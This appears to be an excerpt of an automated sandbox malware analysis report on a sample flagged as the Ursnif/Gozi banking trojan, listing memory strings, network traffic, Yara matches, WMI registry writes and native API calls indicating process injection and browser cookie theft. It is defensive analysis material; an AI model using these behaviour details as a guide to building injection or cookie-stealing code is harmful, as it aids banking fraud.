Source: iab2Data[1].json.4.dr String found in binary or memory: https://listonic.com/privacy/
Source: de-ch[1].htm.4.dr String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;checkda=1&amp;ct=1611054661&amp;rver
Source: de-ch[1].htm.4.dr String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1611054661&amp;rver=7.0.6730.0&am
Source: de-ch[1].htm.4.dr String found in binary or memory: https://login.live.com/logout.srf?ct=1611054662&amp;rver=7.0.6730.0&amp;lc=1033&amp;id=1184&amp;lru=
Source: de-ch[1].htm.4.dr String found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1611054661&amp;rver=7.0.6730.0&amp;w
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
Source: de-ch[1].htm.4.dr String found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;
Source: powershell.exe, 0000001F.00000002.595886985.000002BCBD331000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: https://onedrive.live.com/#qt=mru
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
Source: de-ch[1].htm.4.dr String found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: https://onedrive.live.com/about/en/download/
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: https://onedrive.live.com;Fotos
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: https://onedrive.live.com;OneDrive-App
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
Source: de-ch[1].htm.4.dr String found in binary or memory: https://outlook.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: https://outlook.live.com/calendar
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
Source: de-ch[1].htm.4.dr String found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png&quot;
Source: de-ch[1].htm.4.dr String found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&amp;hl=de-ch&amp;refer
Source: auction[1].htm.4.dr String found in binary or memory: https://policies.oath.com/us/en/oath/privacy/index.html
Source: iab2Data[1].json.4.dr String found in binary or memory: https://portal.eu.numbereight.me/policies-license#software-privacy-notice
Source: iab2Data[1].json.4.dr String found in binary or memory: https://quantyoo.de/datenschutz
Source: iab2Data[1].json.4.dr String found in binary or memory: https://related.hu/adatkezeles/
Source: ~DF24569624759CC30D.TMP.3.dr String found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
Source: de-ch[1].htm.4.dr String found in binary or memory: https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&amp;campid=533862
Source: auction[1].htm.4.dr String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/.UiDyEjfgZbPhaApSjF6RQ--~A/Zmk9ZmlsbDt3PTIwNztoPTI0MTthcHBpZD1nZW1
Source: auction[1].htm.4.dr String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/9FkxQzh8n2OLcwPo6n5irg--~A/Zmk9ZmlsbDt3PTIwNztoPTI0MTthcHBpZD1nZW1
Source: auction[1].htm.4.dr String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/AlAilqKi7W35LtcnI7DHWQ--~A/Zmk9ZmlsbDt3PTIwNztoPTI0MTthcHBpZD1nZW1
Source: de-ch[1].htm.4.dr String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-me
Source: de-ch[1].htm.4.dr String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-shoppingstripe-nav
Source: de-ch[1].htm.4.dr String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=travelnavlink
Source: auction[1].htm.4.dr String found in binary or memory: https://srtb.msn.com:443/notify/viewedg?rid=f16406a7b26f4c8ba0192b5d2df01324&amp;r=infopane&amp;i=3&
Source: de-ch[1].htm.4.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/de-ch/homepage/api/modules/cdnfetch&quot;
Source: imagestore.dat.4.dr, imagestore.dat.3.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: de-ch[1].htm.4.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
Source: de-ch[1].htm.4.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&amp;
Source: de-ch[1].htm.4.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&amp;
Source: de-ch[1].htm.4.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&amp;
Source: de-ch[1].htm.4.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cSLsD.img?h=368&amp
Source: de-ch[1].htm.4.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&amp;w
Source: de-ch[1].htm.4.dr String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&amp;w
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: https://support.skype.com
Source: de-ch[1].htm.4.dr String found in binary or memory: https://twitter.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: https://twitter.com/i/notifications;Ich
Source: de-ch[1].htm.4.dr String found in binary or memory: https://web.vortex.data.msn.com/collect/v1
Source: de-ch[1].htm.4.dr String found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;a
Source: iab2Data[1].json.4.dr String found in binary or memory: https://www.admo.tv/en/privacy-policy
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&amp;awinaffid=696593&amp;clickref=dech-edge-dhp-infopa
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-edge-dhp-river
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-ss&amp;ued=htt
Source: iab2Data[1].json.4.dr String found in binary or memory: https://www.bet365affiliates.com/UI/Pages/Affiliates/Affiliates.aspx?ContentPath
Source: iab2Data[1].json.4.dr String found in binary or memory: https://www.bidstack.com/privacy-policy/
Source: iab2Data[1].json.4.dr String found in binary or memory: https://www.brightcom.com/privacy-policy/
Source: iab2Data[1].json.4.dr String found in binary or memory: https://www.gadsme.com/privacy-policy/
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.msn.com/de-ch
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.msn.com/de-ch/
Source: ~DF24569624759CC30D.TMP.3.dr String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&amp;item=deferred_page%3a1&amp;ignorejs=webcore%2fmodules%2fjsb
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.msn.com/de-ch/homepage/api/modules/fetch&quot;
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata&quot;
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.msn.com/de-ch/news/other/ab-freitag-sind-wir-eine-papeterie-die-z%c3%bcrcher-gewerbler-b
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.msn.com/de-ch/news/other/bei-den-steuern-brauchts-jetzt-keine-unterschrift-mehr/ar-BB1cS
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.msn.com/de-ch/news/other/damit-im-homeoffice-nicht-wieder-der-r%c3%bccken-schmerzt/ar-BB
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.msn.com/de-ch/news/other/das-ansteckungsrisiko-beim-coronavirus-sei-zu-gross-die-zhaw-ve
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.msn.com/de-ch/news/other/der-z%c3%bcrcher-kantonsrat-h%c3%a4lt-nichts-davon-mehr-geld-f%
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.msn.com/de-ch/news/other/drecksarbeit-gemacht-mann-stiftet-14-j%c3%a4hrigen-zu-raub%c3%b
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.msn.com/de-ch/news/other/ernst-stocker-gibt-gas/ar-BB1cRDLV?ocid=hplocalnews
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.msn.com/de-ch/news/other/j%c3%bcdisches-online-treffen-mit-hitler-und-porno-bildern-gest
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.msn.com/de-ch/news/other/streit-um-lohnerh%c3%b6hung-f%c3%bcr-den-z%c3%bcrcher-kantonsra
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.msn.com/de-ch/news/other/uhren-und-schmuck-im-wert-von-%c3%bcber-260-000-franken-geklaut
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&amp;auth=1&amp;wdorigin=msn
Source: iab2Data[1].json.4.dr String found in binary or memory: https://www.remixd.com/privacy_policy.html
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_mestripe_logo_d
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_shop_de&amp;utm
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.skype.com/
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: https://www.skype.com/de
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: https://www.skype.com/de/download-skype
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&amp;vertical=custom&amp;pageType=
Source: de-ch[1].htm.4.dr String found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
Source: iab2Data[1].json.4.dr String found in binary or memory: https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl
Source: 85-0f8009-68ddb2ab[1].js.4.dr String found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
Source: iab2Data[1].json.4.dr String found in binary or memory: https://www.vidstart.com/wp-content/uploads/2018/09/PrivacyPolicyPDF-Vidstart.pdf
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.3:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.3:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 87.248.118.23:443 -> 192.168.2.3:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49740 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.474076066.0000000004C1C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421520265.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.539775758.0000018E59D40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421722913.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421588649.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.559791102.0000000000CC6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421746535.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421559513.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.530782557.0000000002C90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421467795.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421622681.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.541420236.000002BCC5BE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421656779.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7068, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6348, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 6660, type: MEMORY

E-Banking Fraud:

barindex
Detected Gozi e-Banking trojan
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 1_2_04A0CB16
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 1_2_04A0CB16
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie 1_2_04A0CB16
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie 1_2_04A0CB16
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie 1_2_04A0CB16
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.474076066.0000000004C1C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421520265.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.539775758.0000018E59D40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421722913.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421588649.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.559791102.0000000000CC6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421746535.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421559513.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.530782557.0000000002C90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.561356796.00000000049F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421467795.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421622681.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.541420236.000002BCC5BE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.421656779.0000000004E18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7068, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6348, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 6660, type: MEMORY

System Summary:

barindex
Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A0C4B1 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset, 1_2_04A0C4B1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A0547E NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_04A0547E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_049F75AA NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_049F75AA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A0EDF2 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 1_2_04A0EDF2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A0AE64 GetProcAddress,NtCreateSection,memset, 1_2_04A0AE64
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_049FB8EB NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 1_2_049FB8EB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A038DD NtMapViewOfSection, 1_2_04A038DD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A03013 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 1_2_04A03013
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A02131 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 1_2_04A02131
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_049FB96C RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 1_2_049FB96C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A0E3F9 NtQueryInformationProcess, 1_2_04A0E3F9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A0DB15 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 1_2_04A0DB15
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A0FC10 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 1_2_04A0FC10
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_049F86CB NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_049F86CB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A0BE7C memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 1_2_04A0BE7C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A0F7FD OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 1_2_04A0F7FD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A0FF30 NtGetContextThread,RtlNtStatusToDosError, 1_2_04A0FF30
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A03F13 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 1_2_04A03F13
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A1096B memset,NtQueryInformationProcess, 1_2_04A1096B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A02B53 NtQuerySystemInformation,RtlNtStatusToDosError, 1_2_04A02B53
Source: C:\Windows\System32\control.exe Code function: 38_2_00CB6494 NtCreateSection, 38_2_00CB6494
Source: C:\Windows\System32\control.exe Code function: 38_2_00C98820 NtReadVirtualMemory, 38_2_00C98820
Source: C:\Windows\System32\control.exe Code function: 38_2_00CA8D8C NtQueryInformationProcess, 38_2_00CA8D8C
Source: C:\Windows\System32\control.exe Code function: 38_2_00CB59AC NtQueryInformationProcess, 38_2_00CB59AC
Source: C:\Windows\System32\control.exe Code function: 38_2_00CB4D5C NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 38_2_00CB4D5C
Source: C:\Windows\System32\control.exe Code function: 38_2_00C9717C NtQueryInformationToken,NtQueryInformationToken,NtClose, 38_2_00C9717C
Source: C:\Windows\System32\control.exe Code function: 38_2_00CA1E6C NtWriteVirtualMemory, 38_2_00CA1E6C
Source: C:\Windows\System32\control.exe Code function: 38_2_00CB178C NtMapViewOfSection, 38_2_00CB178C
Source: C:\Windows\System32\control.exe Code function: 38_2_00C95384 NtAllocateVirtualMemory, 38_2_00C95384
Source: C:\Windows\System32\control.exe Code function: 38_2_00CA9358 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 38_2_00CA9358
Source: C:\Windows\System32\control.exe Code function: 38_2_00CCA02A NtProtectVirtualMemory,NtProtectVirtualMemory, 38_2_00CCA02A
Contains functionality to launch a process as a different user
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A08C82 CreateProcessAsUserA, 1_2_04A08C82
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_049FFCF3 1_2_049FFCF3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A121B4 1_2_04A121B4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_04A0D1D5 1_2_04A0D1D5
Source: C:\Windows\System32\control.exe Code function: 38_2_00C91008 38_2_00C91008
Source: C:\Windows\System32\control.exe Code function: 38_2_00CA7960 38_2_00CA7960
Source: C:\Windows\System32\control.exe Code function: 38_2_00CA9358 38_2_00CA9358
Source: C:\Windows\System32\control.exe Code function: 38_2_00CA24DC 38_2_00CA24DC
Source: C:\Windows\System32\control.exe Code function: 38_2_00CB38DC 38_2_00CB38DC
Source: C:\Windows\System32\control.exe Code function: 38_2_00C9E8E8 38_2_00C9E8E8
Source: C:\Windows\System32\control.exe Code function: 38_2_00C9F0BC 38_2_00C9F0BC
Source: C:\Windows\System32\control.exe Code function: 38_2_00CAD47C 38_2_00CAD47C
Source: C:\Windows\System32\control.exe Code function: 38_2_00CB6008 38_2_00CB6008
